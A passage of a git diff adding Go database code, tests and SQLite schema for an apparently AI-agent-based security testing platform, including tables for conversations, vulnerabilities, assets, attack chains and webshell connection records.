!= nil { + detail.CreatedAt, _ = time.Parse(time.RFC3339, createdAt) + } + + details = append(details, detail) + } + + return details, total, nil +} + +// GetProcessDetailOffset 返回某条过程详情在所属消息详情流中的零基 offset。 +func (db *DB) GetProcessDetailOffset(messageID, detailID string) (int, error) { + messageID = strings.TrimSpace(messageID) + detailID = strings.TrimSpace(detailID) + if messageID == "" || detailID == "" { + return 0, fmt.Errorf("messageID and detailID are required") + } + var createdAt string + var rowID int64 + if err := db.QueryRow( + "SELECT created_at, rowid FROM process_details WHERE message_id = ? AND id = ?", + messageID, detailID, + ).Scan(&createdAt, &rowID); err != nil { + if err == sql.ErrNoRows { + return 0, fmt.Errorf("过程详情不存在") + } + return 0, fmt.Errorf("查询过程详情锚点失败: %w", err) + } + var offset int + if err := db.QueryRow( + `SELECT COUNT(*) FROM process_details + WHERE message_id = ? + AND (created_at < ? OR (created_at = ? AND rowid < ?))`, + messageID, createdAt, createdAt, rowID, + ).Scan(&offset); err != nil { + return 0, fmt.Errorf("计算过程详情锚点位置失败: %w", err) + } + return offset, nil +} + +// GetProcessDetailsByConversation 获取对话的所有过程详情(按消息分组) +func (db *DB) GetProcessDetailsByConversation(conversationID string) (map[string][]ProcessDetail, error) { + rows, err := db.Query( + "SELECT id, message_id, conversation_id, event_type, message, data, created_at FROM process_details WHERE conversation_id = ? ORDER BY created_at ASC, rowid ASC", + conversationID, + ) + if err != nil { + return nil, fmt.Errorf("查询过程详情失败: %w", err) + } + defer rows.Close() + + detailsMap := make(map[string][]ProcessDetail) + for rows.Next() { + var detail ProcessDetail + var createdAt string + + if err := rows.Scan(&detail.ID, &detail.MessageID, &detail.ConversationID, &detail.EventType, &detail.Message, &detail.Data, &createdAt); err != nil { + return nil, fmt.Errorf("扫描过程详情失败: %w", err) + } + + // 尝试多种时间格式解析 + var err error + detail.CreatedAt, err = time.Parse("2006-01-02 15:04:05.999999999-07:00", createdAt) + if err != nil { + detail.CreatedAt, err = time.Parse("2006-01-02 15:04:05", createdAt) + } + if err != nil { + detail.CreatedAt, _ = time.Parse(time.RFC3339, createdAt) + } + + detailsMap[detail.MessageID] = append(detailsMap[detail.MessageID], detail) + } + + return detailsMap, nil +} diff --git a/internal/database/conversation_cleanup_test.go b/internal/database/conversation_cleanup_test.go new file mode 100644 index 00000000..a2bc384d --- /dev/null +++ b/internal/database/conversation_cleanup_test.go @@ -0,0 +1,108 @@ +package database + +import ( + "os" + "path/filepath" + "testing" + + "go.uber.org/zap" +) + +func TestDeleteConversationRemovesEinoScopedDirs(t *testing.T) { + tmp := t.TempDir() + dbPath := filepath.Join(tmp, "conversations.db") + db, err := NewDB(dbPath, zap.NewNop()) + if err != nil { + t.Fatalf("NewDB: %v", err) + } + defer db.Close() + + plantaskBase := filepath.Join(tmp, "skills", ".eino", "plantask") + checkpointBase := filepath.Join(tmp, "eino-checkpoints") + reductionBase := filepath.Join(tmp, "reduction") + workspaceBase := filepath.Join(tmp, "workspace") + db.SetEinoConversationDirs(plantaskBase, checkpointBase, reductionBase, workspaceBase) + + conv, err := db.CreateConversation("cleanup test", ConversationCreateMeta{}) + if err != nil { + t.Fatalf("CreateConversation: %v", err) + } + convID := conv.ID + seg := sanitizeConversationPathSegment(convID) + for _, base := range []struct { + root string + file string + }{ + {db.conversationArtifactsDir, "transcript.txt"}, + {plantaskBase, "task-1.json"}, + {checkpointBase, "runner-deep.ckpt"}, + {filepath.Join(reductionBase, "conversations"), "tool-output.txt"}, + {filepath.Join(workspaceBase, "conversations"), "page.html"}, + } { + dir := filepath.Join(base.root, seg) + if err := os.MkdirAll(dir, 0o755); err != nil { + t.Fatalf("mkdir %s: %v", dir, err) + } + if err := os.WriteFile(filepath.Join(dir, base.file), []byte("x"), 0o644); err != nil { + t.Fatalf("write %s: %v", base.file, err) + } + } + + if err := db.DeleteConversation(convID); err != nil { + t.Fatalf("DeleteConversation: %v", err) + } + + for _, base := range []string{db.conversationArtifactsDir, plantaskBase, checkpointBase, filepath.Join(reductionBase, "conversations"), filepath.Join(workspaceBase, "conversations")} { + dir := filepath.Join(base, seg) + if _, statErr := os.Stat(dir); !os.IsNotExist(statErr) { + t.Fatalf("expected removed dir %s, stat err=%v", dir, statErr) + } + } +} + +func TestDeleteProjectRemovesReductionDir(t *testing.T) { + tmp := t.TempDir() + dbPath := filepath.Join(tmp, "conversations.db") + db, err := NewDB(dbPath, zap.NewNop()) + if err != nil { + t.Fatalf("NewDB: %v", err) + } + defer db.Close() + + reductionBase := filepath.Join(tmp, "reduction") + workspaceBase := filepath.Join(tmp, "workspace") + db.SetEinoConversationDirs("", "", reductionBase, workspaceBase) + + project, err := db.CreateProject(&Project{Name: "cleanup test"}) + if err != nil { + t.Fatalf("CreateProject: %v", err) + } + seg := sanitizeConversationPathSegment(project.ID) + reductionDir := filepath.Join(reductionBase, "projects", seg, "clear") + if err := os.MkdirAll(reductionDir, 0o755); err != nil { + t.Fatalf("mkdir %s: %v", reductionDir, err) + } + if err := os.WriteFile(filepath.Join(reductionDir, "call-1.txt"), []byte("x"), 0o644); err != nil { + t.Fatalf("write: %v", err) + } + workspaceDir := filepath.Join(workspaceBase, "projects", seg, "downloads") + if err := os.MkdirAll(workspaceDir, 0o755); err != nil { + t.Fatalf("mkdir %s: %v", workspaceDir, err) + } + if err := os.WriteFile(filepath.Join(workspaceDir, "app.js"), []byte("x"), 0o644); err != nil { + t.Fatalf("write workspace: %v", err) + } + + if err := db.DeleteProject(project.ID); err != nil { + t.Fatalf("DeleteProject: %v", err) + } + + projectReductionDir := filepath.Join(reductionBase, "projects", seg) + if _, statErr := os.Stat(projectReductionDir); !os.IsNotExist(statErr) { + t.Fatalf("expected removed dir %s, stat err=%v", projectReductionDir, statErr) + } + projectWorkspaceDir := filepath.Join(workspaceBase, "projects", seg) + if _, statErr := os.Stat(projectWorkspaceDir); !os.IsNotExist(statErr) { + t.Fatalf("expected removed dir %s, stat err=%v", projectWorkspaceDir, statErr) + } +} diff --git a/internal/database/conversation_create_meta.go b/internal/database/conversation_create_meta.go new file mode 100644 index 00000000..c2451088 --- /dev/null +++ b/internal/database/conversation_create_meta.go @@ -0,0 +1,32 @@ +package database + +// ConversationCreateMeta describes how a conversation was created (for audit hooks). +type ConversationCreateMeta struct { + Source string + WebShellConnectionID string + ProjectID string + RoleName string + AgentMode string + ClientIP string + SessionHint string +} + +// ConversationCreateHook is invoked after a conversation row is inserted. +type ConversationCreateHook func(conv *Conversation, meta ConversationCreateMeta) + +var conversationCreateHook ConversationCreateHook + +// SetConversationCreateHook registers a global hook (e.g. platform audit). +func SetConversationCreateHook(h ConversationCreateHook) { + conversationCreateHook = h +} + +func notifyConversationCreated(conv *Conversation, meta ConversationCreateMeta) { + if conversationCreateHook == nil || conv == nil { + return + } + if meta.Source == "" { + meta.Source = "unknown" + } + conversationCreateHook(conv, meta) +} diff --git a/internal/database/conversation_project_filter_test.go b/internal/database/conversation_project_filter_test.go new file mode 100644 index 00000000..457542b7 --- /dev/null +++ b/internal/database/conversation_project_filter_test.go @@ -0,0 +1,60 @@ +package database + +import ( + "path/filepath" + "testing" + + "go.uber.org/zap" +) + +func TestConversationProjectFilter(t *testing.T) { + tmp := t.TempDir() + dbPath := filepath.Join(tmp, "conversations.db") + db, err := NewDB(dbPath, zap.NewNop()) + if err != nil { + t.Fatalf("NewDB: %v", err) + } + defer db.Close() + + p, err := db.CreateProject(&Project{Name: "target-a", Status: "active"}) + if err != nil { + t.Fatalf("CreateProject: %v", err) + } + + convNone, err := db.CreateConversation("unbound", ConversationCreateMeta{}) + if err != nil { + t.Fatalf("CreateConversation unbound: %v", err) + } + convBound, err := db.CreateConversation("bound", ConversationCreateMeta{ProjectID: p.ID}) + if err != nil { + t.Fatalf("CreateConversation bound: %v", err) + } + + totalAll, err := db.CountConversations("", "") + if err != nil || totalAll < 2 { + t.Fatalf("CountConversations all: total=%d err=%v", totalAll, err) + } + + totalBound, err := db.CountConversations("", p.ID) + if err != nil || totalBound != 1 { + t.Fatalf("CountConversations project: total=%d err=%v", totalBound, err) + } + + totalUnbound, err := db.CountConversations("", ProjectFilterUnbound) + if err != nil || totalUnbound != 1 { + t.Fatalf("CountConversations unbound: total=%d err=%v", totalUnbound, err) + } + + listBound, err := db.ListConversations(10, 0, "", "", p.ID) + if err != nil || len(listBound) != 1 || listBound[0].ID != convBound.ID { + t.Fatalf("ListConversations project: %+v err=%v", listBound, err) + } + + listUnbound, err := db.ListConversations(10, 0, "", "", ProjectFilterUnbound) + if err != nil || len(listUnbound) != 1 || listUnbound[0].ID != convNone.ID { + t.Fatalf("ListConversations unbound: %+v err=%v", listUnbound, err) + } + + _ = convNone + _ = convBound +} diff --git a/internal/database/conversation_turn_test.go b/internal/database/conversation_turn_test.go new file mode 100644 index 00000000..68743468 --- /dev/null +++ b/internal/database/conversation_turn_test.go @@ -0,0 +1,39 @@ +package database + +import ( + "testing" +) + +func TestTurnSliceRange(t *testing.T) { + mk := func(id, role string) Message { + return Message{ID: id, Role: role} + } + msgs := []Message{ + mk("u1", "user"), + mk("a1", "assistant"), + mk("u2", "user"), + mk("a2", "assistant"), + } + cases := []struct { + anchor string + start int + end int + }{ + {"u1", 0, 2}, + {"a1", 0, 2}, + {"u2", 2, 4}, + {"a2", 2, 4}, + } + for _, tc := range cases { + s, e, err := turnSliceRange(msgs, tc.anchor) + if err != nil { + t.Fatalf("anchor %s: %v", tc.anchor, err) + } + if s != tc.start || e != tc.end { + t.Fatalf("anchor %s: got [%d,%d) want [%d,%d)", tc.anchor, s, e, tc.start, tc.end) + } + } + if _, _, err := turnSliceRange(msgs, "nope"); err == nil { + t.Fatal("expected error for missing id") + } +} diff --git a/internal/database/conversation_vulnerability_test.go b/internal/database/conversation_vulnerability_test.go new file mode 100644 index 00000000..f173d5ab --- /dev/null +++ b/internal/database/conversation_vulnerability_test.go @@ -0,0 +1,69 @@ +package database + +import ( + "path/filepath" + "testing" + + "go.uber.org/zap" +) + +func TestDeleteConversationPreservesVulnerabilities(t *testing.T) { + tmp := t.TempDir() + dbPath := filepath.Join(tmp, "vuln-preserve.db") + db, err := NewDB(dbPath, zap.NewNop()) + if err != nil { + t.Fatalf("NewDB: %v", err) + } + defer db.Close() + + conv, err := db.CreateConversation("vuln source chat", ConversationCreateMeta{}) + if err != nil { + t.Fatalf("CreateConversation: %v", err) + } + + vuln, err := db.CreateVulnerability(&Vulnerability{ + ConversationID: conv.ID, + Title: "SQL Injection", + Severity: "high", + Status: "open", + }) + if err != nil { + t.Fatalf("CreateVulnerability: %v", err) + } + + if err := db.DeleteConversation(conv.ID); err != nil { + t.Fatalf("DeleteConversation: %v", err) + } + + got, err := db.GetVulnerability(vuln.ID) + if err != nil { + t.Fatalf("GetVulnerability after delete: %v", err) + } + if got.Title != "SQL Injection" { + t.Fatalf("title = %q, want SQL Injection", got.Title) + } + if got.ConversationID != "" { + t.Fatalf("conversation_id = %q, want empty after conversation delete", got.ConversationID) + } + if got.ConversationTag != "vuln source chat" { + t.Fatalf("conversation_tag = %q, want vuln source chat", got.ConversationTag) + } +} + +func TestMigrateVulnerabilitiesConversationFK(t *testing.T) { + tmp := t.TempDir() + dbPath := filepath.Join(tmp, "vuln-fk-migrate.db") + db, err := NewDB(dbPath, zap.NewNop()) + if err != nil { + t.Fatalf("NewDB: %v", err) + } + defer db.Close() + + ok, err := vulnerabilitiesConversationFKOnDeleteSetNull(db.DB) + if err != nil { + t.Fatalf("vulnerabilitiesConversationFKOnDeleteSetNull: %v", err) + } + if !ok { + t.Fatal("expected vulnerabilities.conversation_id FK to use ON DELETE SET NULL") + } +} diff --git a/internal/database/database.go b/internal/database/database.go new file mode 100644 index 00000000..35884987 --- /dev/null +++ b/internal/database/database.go @@ -0,0 +1,1829 @@ +package database + +import ( + "database/sql" + "fmt" + "os" + "path/filepath" + "strings" + "sync" + "time" + + _ "github.com/mattn/go-sqlite3" + "go.uber.org/zap" +) + +const ( + // SQLite 在 WAL 模式下建议使用较保守的连接数,降低长读快照导致 checkpoint 饥饿的概率。 + sqliteMaxOpenConns = 25 + sqliteMaxIdleConns = 5 + // 以页为单位的自动 checkpoint 触发阈值(默认 1000 页,约 4MB @ 4KB/page)。 + sqliteWALAutoCheckpointPages = 1000 + // 控制 WAL 目标上限,避免异常场景持续膨胀(256MB)。 + sqliteJournalSizeLimitBytes = 256 * 1024 * 1024 + // 定时执行 PASSIVE checkpoint,平滑推进 WAL 回收。 + sqlitePassiveCheckpointInterval = 300 * time.Second +) + +// configureDBPool 设置 SQLite 连接池参数,提升并发稳定性 +func configureDBPool(db *sql.DB) { + // SQLite 同一时间只允许一个写入者;过高连接数会放大锁竞争和 WAL 回收延迟。 + db.SetMaxOpenConns(sqliteMaxOpenConns) + db.SetMaxIdleConns(sqliteMaxIdleConns) + db.SetConnMaxLifetime(30 * time.Minute) +} + +// configureSQLitePragmas 调整 WAL 回收行为,降低 -wal 文件长期膨胀风险。 +func configureSQLitePragmas(db *sql.DB) error { + if _, err := db.Exec(fmt.Sprintf("PRAGMA wal_autocheckpoint=%d", sqliteWALAutoCheckpointPages)); err != nil { + return fmt.Errorf("设置 wal_autocheckpoint 失败: %w", err) + } + if _, err := db.Exec(fmt.Sprintf("PRAGMA journal_size_limit=%d", sqliteJournalSizeLimitBytes)); err != nil { + return fmt.Errorf("设置 journal_size_limit 失败: %w", err) + } + return nil +} + +// DB 数据库连接 +type DB struct { + *sql.DB + logger *zap.Logger + conversationArtifactsDir string + einoPlantaskBaseDir string // skills_dir + plantask_rel_dir (per-conversation subdirs) + einoCheckpointBaseDir string // checkpoint_dir root (per-conversation subdirs) + einoReductionRootDir string // reduction_root_dir or default tmp/reduction (conversations/ subdirs) + einoWorkspaceRootDir string // workspace_root_dir or default tmp/workspace (projects|conversations/ subdirs) + checkpointLoopName string + checkpointStop chan struct{} + checkpointDone chan struct{} + closeOnce sync.Once + closeErr error + vulnerabilityCreatedHook func(*Vulnerability) +} + +// startPassiveCheckpointLoop 启动后台 PASSIVE checkpoint 循环。 +func (db *DB) startPassiveCheckpointLoop(name string) { + if sqlitePassiveCheckpointInterval <= 0 || db == nil || db.DB == nil { + return + } + db.checkpointLoopName = strings.TrimSpace(name) + db.checkpointStop = make(chan struct{}) + db.checkpointDone = make(chan struct{}) + + go func() { + defer close(db.checkpointDone) + ticker := time.NewTicker(sqlitePassiveCheckpointInterval) + defer ticker.Stop() + + // 启动后先尝试一次,尽快回收已有 WAL 堆积。 + db.runPassiveCheckpoint("startup") + for { + select { + case <-db.checkpointStop: + return + case <-ticker.C: + db.runPassiveCheckpoint("ticker") + } + } + }() +} + +// runPassiveCheckpoint 执行一次 PRAGMA wal_checkpoint(PASSIVE)。 +func (db *DB) runPassiveCheckpoint(trigger string) { + if db == nil || db.DB == nil { + return + } + startAt := time.Now() + var busy, logFrames, checkpointed int + err := db.QueryRow("PRAGMA wal_checkpoint(PASSIVE)").Scan(&busy, &logFrames, &checkpointed) + if db.logger == nil { + return + } + fields := []zap.Field{ + zap.String("db", db.checkpointLoopName), + zap.String("trigger", trigger), + zap.Int("busy", busy), + zap.Int("log_frames", logFrames), + zap.Int("checkpointed_frames", checkpointed), + zap.Int64("elapsed_ms", time.Since(startAt).Milliseconds()), + } + if err != nil { + db.logger.Warn("SQLite PASSIVE checkpoint 完成(失败)", + append(fields, zap.Error(err))..., + ) + return + } + if busy > 0 { + db.logger.Debug("SQLite PASSIVE checkpoint 完成(部分推进)", fields...) + return + } + db.logger.Debug("SQLite PASSIVE checkpoint 完成(成功)", fields...) +} + +// NewDB 创建数据库连接 +func NewDB(dbPath string, logger *zap.Logger) (*DB, error) { + db, err := sql.Open("sqlite3", dbPath+"?_journal_mode=WAL&_foreign_keys=1&_busy_timeout=5000&_synchronous=NORMAL") + if err != nil { + return nil, fmt.Errorf("打开数据库失败: %w", err) + } + + configureDBPool(db) + + if err := db.Ping(); err != nil { + _ = db.Close() + return nil, fmt.Errorf("连接数据库失败: %w", err) + } + if err := configureSQLitePragmas(db); err != nil { + _ = db.Close() + return nil, fmt.Errorf("配置数据库 PRAGMA 失败: %w", err) + } + + database := &DB{ + DB: db, + logger: logger, + } + // Keep conversation-scoped artifacts near database files, so cleanup can follow conversation lifecycle. + baseDir := filepath.Join(filepath.Dir(dbPath), "conversation_artifacts") + if mkErr := os.MkdirAll(baseDir, 0o755); mkErr == nil { + database.conversationArtifactsDir = baseDir + } else if logger != nil { + logger.Warn("创建 conversation artifacts 目录失败", zap.String("dir", baseDir), zap.Error(mkErr)) + } + + // 初始化表 + if err := database.initTables(); err != nil { + _ = db.Close() + return nil, fmt.Errorf("初始化表失败: %w", err) + } + database.startPassiveCheckpointLoop("conversations") + + return database, nil +} + +// SetEinoConversationDirs configures best-effort filesystem cleanup on DeleteConversation. +// plantaskBase is skills_root/plantask_rel (no conversation id); checkpointBase is checkpoint_dir root. +// reductionRoot is reduction_root_dir from config; empty uses tmp/reduction (conversation-scoped subdirs only). +// workspaceRoot is agent.workspace_root_dir from config; empty uses tmp/workspace. +func (db *DB) SetEinoConversationDirs(plantaskBase, checkpointBase, reductionRoot, workspaceRoot string) { + if db == nil { + return + } + db.einoPlantaskBaseDir = strings.TrimSpace(plantaskBase) + db.einoCheckpointBaseDir = strings.TrimSpace(checkpointBase) + db.einoReductionRootDir = strings.TrimSpace(reductionRoot) + db.einoWorkspaceRootDir = strings.TrimSpace(workspaceRoot) +} + +// initTables 初始化数据库表 +func (db *DB) initTables() error { + // 创建对话表(last_react_input / last_react_output 存「代理消息轨迹」JSON 与助手摘要,列名保留以兼容已有库) + createConversationsTable := ` + CREATE TABLE IF NOT EXISTS conversations ( + id TEXT PRIMARY KEY, + title TEXT NOT NULL, + created_at DATETIME NOT NULL, + updated_at DATETIME NOT NULL, + role_name TEXT NOT NULL DEFAULT '默认', + agent_mode TEXT NOT NULL DEFAULT 'eino_single', + last_react_input TEXT, + last_react_output TEXT + );` + + // 创建消息表 + createMessagesTable := ` + CREATE TABLE IF NOT EXISTS messages ( + id TEXT PRIMARY KEY, + conversation_id TEXT NOT NULL, + role TEXT NOT NULL, + content TEXT NOT NULL, + mcp_execution_ids TEXT, + created_at DATETIME NOT NULL, + updated_at DATETIME NOT NULL, + FOREIGN KEY (conversation_id) REFERENCES conversations(id) ON DELETE CASCADE + );` + + // 创建过程详情表 + createProcessDetailsTable := ` + CREATE TABLE IF NOT EXISTS process_details ( + id TEXT PRIMARY KEY, + message_id TEXT NOT NULL, + conversation_id TEXT NOT NULL, + event_type TEXT NOT NULL, + message TEXT, + data TEXT, + created_at DATETIME NOT NULL, + FOREIGN KEY (message_id) REFERENCES messages(id) ON DELETE CASCADE, + FOREIGN KEY (conversation_id) REFERENCES conversations(id) ON DELETE CASCADE + );` + + // 创建工具执行记录表 + createToolExecutionsTable := ` + CREATE TABLE IF NOT EXISTS tool_executions ( + id TEXT PRIMARY KEY, + tool_name TEXT NOT NULL, + arguments TEXT NOT NULL, + status TEXT NOT NULL, + result TEXT, + error TEXT, + start_time DATETIME NOT NULL, + end_time DATETIME, + duration_ms INTEGER, + partial_output TEXT, + partial_output_bytes INTEGER NOT NULL DEFAULT 0, + partial_output_truncated INTEGER NOT NULL DEFAULT 0, + partial_output_updated_at DATETIME, + owner_user_id TEXT, + conversation_id TEXT, + created_at DATETIME NOT NULL DEFAULT CURRENT_TIMESTAMP + );` + + // 创建工具统计表 + createToolStatsTable := ` + CREATE TABLE IF NOT EXISTS tool_stats ( + tool_name TEXT PRIMARY KEY, + total_calls INTEGER NOT NULL DEFAULT 0, + success_calls INTEGER NOT NULL DEFAULT 0, + failed_calls INTEGER NOT NULL DEFAULT 0, + last_call_time DATETIME, + updated_at DATETIME NOT NULL DEFAULT CURRENT_TIMESTAMP + );` + + // 创建Skills统计表 + createSkillStatsTable := ` + CREATE TABLE IF NOT EXISTS skill_stats ( + skill_name TEXT PRIMARY KEY, + total_calls INTEGER NOT NULL DEFAULT 0, + success_calls INTEGER NOT NULL DEFAULT 0, + failed_calls INTEGER NOT NULL DEFAULT 0, + last_call_time DATETIME, + updated_at DATETIME NOT NULL DEFAULT CURRENT_TIMESTAMP + );` + + // 创建攻击链节点表 + createAttackChainNodesTable := ` + CREATE TABLE IF NOT EXISTS attack_chain_nodes ( + id TEXT PRIMARY KEY, + conversation_id TEXT NOT NULL, + node_type TEXT NOT NULL, + node_name TEXT NOT NULL, + tool_execution_id TEXT, + metadata TEXT, + risk_score INTEGER DEFAULT 0, + created_at DATETIME NOT NULL DEFAULT CURRENT_TIMESTAMP, + FOREIGN KEY (conversation_id) REFERENCES conversations(id) ON DELETE CASCADE, + FOREIGN KEY (tool_execution_id) REFERENCES tool_executions(id) ON DELETE SET NULL + );` + + // 创建攻击链边表 + createAttackChainEdgesTable := ` + CREATE TABLE IF NOT EXISTS attack_chain_edges ( + id TEXT PRIMARY KEY, + conversation_id TEXT NOT NULL, + source_node_id TEXT NOT NULL, + target_node_id TEXT NOT NULL, + edge_type TEXT NOT NULL, + weight INTEGER DEFAULT 1, + created_at DATETIME NOT NULL DEFAULT CURRENT_TIMESTAMP, + FOREIGN KEY (conversation_id) REFERENCES conversations(id) ON DELETE CASCADE, + FOREIGN KEY (source_node_id) REFERENCES attack_chain_nodes(id) ON DELETE CASCADE, + FOREIGN KEY (target_node_id) REFERENCES attack_chain_nodes(id) ON DELETE CASCADE + );` + + // 创建知识检索日志表(保留在会话数据库中,因为有外键关联) + createKnowledgeRetrievalLogsTable := ` + CREATE TABLE IF NOT EXISTS knowledge_retrieval_logs ( + id TEXT PRIMARY KEY, + conversation_id TEXT, + message_id TEXT, + query TEXT NOT NULL, + risk_type TEXT, + retrieved_items TEXT, + created_at DATETIME NOT NULL, + FOREIGN KEY (conversation_id) REFERENCES conversations(id) ON DELETE SET NULL, + FOREIGN KEY (message_id) REFERENCES messages(id) ON DELETE SET NULL + );` + + // 创建对话分组表 + createConversationGroupsTable := ` + CREATE TABLE IF NOT EXISTS conversation_groups ( + id TEXT PRIMARY KEY, + name TEXT NOT NULL, + icon TEXT, + owner_user_id TEXT, + created_at DATETIME NOT NULL, + updated_at DATETIME NOT NULL + );` + + // 创建对话分组映射表 + createConversationGroupMappingsTable := ` + CREATE TABLE IF NOT EXISTS conversation_group_mappings ( + id TEXT PRIMARY KEY, + conversation_id TEXT NOT NULL, + group_id TEXT NOT NULL, + created_at DATETIME NOT NULL, + FOREIGN KEY (conversation_id) REFERENCES conversations(id) ON DELETE CASCADE, + FOREIGN KEY (group_id) REFERENCES conversation_groups(id) ON DELETE CASCADE, + UNIQUE(conversation_id, group_id) + );` + + // 机器人会话绑定表(用于跨重启保持「平台+租户+用户」到 conversation 的映射) + createRobotUserSessionsTable := ` + CREATE TABLE IF NOT EXISTS robot_user_sessions ( + session_key TEXT PRIMARY KEY, + conversation_id TEXT NOT NULL, + role_name TEXT NOT NULL DEFAULT '默认', + agent_mode TEXT NOT NULL DEFAULT 'eino_single', + updated_at DATETIME NOT NULL DEFAULT CURRENT_TIMESTAMP, + FOREIGN KEY (conversation_id) REFERENCES conversations(id) ON DELETE CASCADE + );` + + // 创建项目表 + createProjectsTable := ` + CREATE TABLE IF NOT EXISTS projects ( + id TEXT PRIMARY KEY, + name TEXT NOT NULL, + description TEXT, + scope_json TEXT, + status TEXT NOT NULL DEFAULT 'active', + pinned INTEGER NOT NULL DEFAULT 0, + created_at DATETIME NOT NULL, + updated_at DATETIME NOT NULL + );` + + // 创建项目事实表(黑板) + createProjectFactsTable := ` + CREATE TABLE IF NOT EXISTS project_facts ( + id TEXT PRIMARY KEY, + project_id TEXT NOT NULL, + fact_key TEXT NOT NULL, + category TEXT NOT NULL DEFAULT 'note', + summary TEXT NOT NULL DEFAULT '', + body TEXT, + confidence TEXT NOT NULL DEFAULT 'tentative', + source_conversation_id TEXT, + source_message_id TEXT, + pinned INTEGER NOT NULL DEFAULT 0, + related_vulnerability_id TEXT, + created_at DATETIME NOT NULL, + updated_at DATETIME NOT NULL, + FOREIGN KEY (project_id) REFERENCES projects(id) ON DELETE CASCADE, + UNIQUE(project_id, fact_key) + );` + + // 项目事实关系边(黑板 DAG) + createProjectFactEdgesTable := ` + CREATE TABLE IF NOT EXISTS project_fact_edges ( + id TEXT PRIMARY KEY, + project_id TEXT NOT NULL, + source_fact_key TEXT NOT NULL, + target_fact_key TEXT NOT NULL, + edge_type TEXT NOT NULL, + confidence TEXT NOT NULL DEFAULT 'tentative', + source_conversation_id TEXT, + created_at DATETIME NOT NULL, + updated_at DATETIME NOT NULL, + FOREIGN KEY (project_id) REFERENCES projects(id) ON DELETE CASCADE, + UNIQUE(project_id, source_fact_key, target_fact_key, edge_type) + );` + + // 创建漏洞表 + createVulnerabilitiesTable := ` + CREATE TABLE IF NOT EXISTS vulnerabilities ( + id TEXT PRIMARY KEY, + conversation_id TEXT, + conversation_tag TEXT, + task_tag TEXT, + title TEXT NOT NULL, + description TEXT, + severity TEXT NOT NULL, + status TEXT NOT NULL DEFAULT 'open', + vulnerability_type TEXT, + target TEXT, + preconditions TEXT, + reproduction_steps TEXT, + evidence TEXT, + impact TEXT, + recommendation TEXT, + retest_notes TEXT, + created_at DATETIME NOT NULL DEFAULT CURRENT_TIMESTAMP, + updated_at DATETIME NOT NULL DEFAULT CURRENT_TIMESTAMP, + project_id TEXT, + FOREIGN KEY (conversation_id) REFERENCES conversations(id) ON DELETE SET NULL + );` + + createAssetsTable := ` + CREATE TABLE IF NOT EXISTS assets ( + id TEXT PRIMARY KEY, + dedup_key TEXT NOT NULL UNIQUE, project_id TEXT, + host TEXT NOT NULL DEFAULT '', ip TEXT NOT NULL DEFAULT '', port INTEGER NOT NULL DEFAULT 0, + domain TEXT NOT NULL DEFAULT '', protocol TEXT NOT NULL DEFAULT '', title TEXT NOT NULL DEFAULT '', + server TEXT NOT NULL DEFAULT '', country TEXT NOT NULL DEFAULT '', province TEXT NOT NULL DEFAULT '', city TEXT NOT NULL DEFAULT '', + responsible_person TEXT NOT NULL DEFAULT '', department TEXT NOT NULL DEFAULT '', business_system TEXT NOT NULL DEFAULT '', + environment TEXT NOT NULL DEFAULT '', criticality TEXT NOT NULL DEFAULT '', + source TEXT NOT NULL DEFAULT 'manual', source_query TEXT NOT NULL DEFAULT '', status TEXT NOT NULL DEFAULT 'active', + vulnerability_count INTEGER NOT NULL DEFAULT 0, risk_score INTEGER NOT NULL DEFAULT 0, risk_level TEXT NOT NULL DEFAULT 'unassessed', + tags_json TEXT NOT NULL DEFAULT '[]', first_seen_at DATETIME NOT NULL, last_seen_at DATETIME NOT NULL, + created_at DATETIME NOT NULL, updated_at DATETIME NOT NULL, owner_user_id TEXT, + FOREIGN KEY (project_id) REFERENCES projects(id) ON DELETE SET NULL + );` + + createVulnerabilityAlertSubscriptionsTable := ` + CREATE TABLE IF NOT EXISTS vulnerability_alert_subscriptions ( + user_id TEXT PRIMARY KEY, + enabled INTEGER NOT NULL DEFAULT 0, + min_severity TEXT NOT NULL DEFAULT 'high', + created_at DATETIME NOT NULL DEFAULT CURRENT_TIMESTAMP, + updated_at DATETIME NOT NULL DEFAULT CURRENT_TIMESTAMP, + FOREIGN KEY (user_id) REFERENCES rbac_users(id) ON DELETE CASCADE + );` + createVulnerabilityAlertDeliveriesTable := ` + CREATE TABLE IF NOT EXISTS vulnerability_alert_deliveries ( + id INTEGER PRIMARY KEY AUTOINCREMENT, + vulnerability_id TEXT NOT NULL, + user_id TEXT NOT NULL, + platform TEXT NOT NULL, + external_user_id TEXT NOT NULL, + status TEXT NOT NULL DEFAULT 'pending', + attempts INTEGER NOT NULL DEFAULT 0, + next_attempt_at DATETIME NOT NULL DEFAULT CURRENT_TIMESTAMP, + last_error TEXT NOT NULL DEFAULT '', + created_at DATETIME NOT NULL DEFAULT CURRENT_TIMESTAMP, + updated_at DATETIME NOT NULL DEFAULT CURRENT_TIMESTAMP, + UNIQUE(vulnerability_id, platform, external_user_id), + FOREIGN KEY (vulnerability_id) REFERENCES vulnerabilities(id) ON DELETE CASCADE, + FOREIGN KEY (user_id) REFERENCES rbac_users(id) ON DELETE CASCADE + );` + + // 创建批量任务队列表 + createBatchTaskQueuesTable := ` + CREATE TABLE IF NOT EXISTS batch_task_queues ( + id TEXT PRIMARY KEY, + title TEXT, + role TEXT, + agent_mode TEXT NOT NULL DEFAULT 'eino_single', + schedule_mode TEXT NOT NULL DEFAULT 'manual', + cron_expr TEXT, + next_run_at DATETIME, + schedule_enabled INTEGER NOT NULL DEFAULT 1, + last_schedule_trigger_at DATETIME, + last_schedule_error TEXT, + last_run_error TEXT, + project_id TEXT, + concurrency INTEGER NOT NULL DEFAULT 1, + status TEXT NOT NULL, + created_at DATETIME NOT NULL, + started_at DATETIME, + completed_at DATETIME, + current_index INTEGER NOT NULL DEFAULT 0 + );` + + // 创建批量任务表 + createBatchTasksTable := ` + CREATE TABLE IF NOT EXISTS batch_tasks ( + id TEXT PRIMARY KEY, + queue_id TEXT NOT NULL, + message TEXT NOT NULL, + conversation_id TEXT, + status TEXT NOT NULL, + started_at DATETIME, + completed_at DATETIME, + error TEXT, + result TEXT, + FOREIGN KEY (queue_id) REFERENCES batch_task_queues(id) ON DELETE CASCADE + );` + + // 创建 WebShell 连接表 + createWebshellConnectionsTable := ` + CREATE TABLE IF NOT EXISTS webshell_connections ( + id TEXT PRIMARY KEY, + project_id TEXT, + url TEXT NOT NULL, + password TEXT NOT NULL DEFAULT '', + type TEXT NOT NULL DEFAULT 'php', + method TEXT NOT NULL DEFAULT 'post', + cmd_param TEXT NOT NULL DEFAULT '', + remark TEXT NOT NULL DEFAULT '', + encoding TEXT NOT NULL DEFAULT '', + os TEXT NOT NULL DEFAULT '', + created_at 